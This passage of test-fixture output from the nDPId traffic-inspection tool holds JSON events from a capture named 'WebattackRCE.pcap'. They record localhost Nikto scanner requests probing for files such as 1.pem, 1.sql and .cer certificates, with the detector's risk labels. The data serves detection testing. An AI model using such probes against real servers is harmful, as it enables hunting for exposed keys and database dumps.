-01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 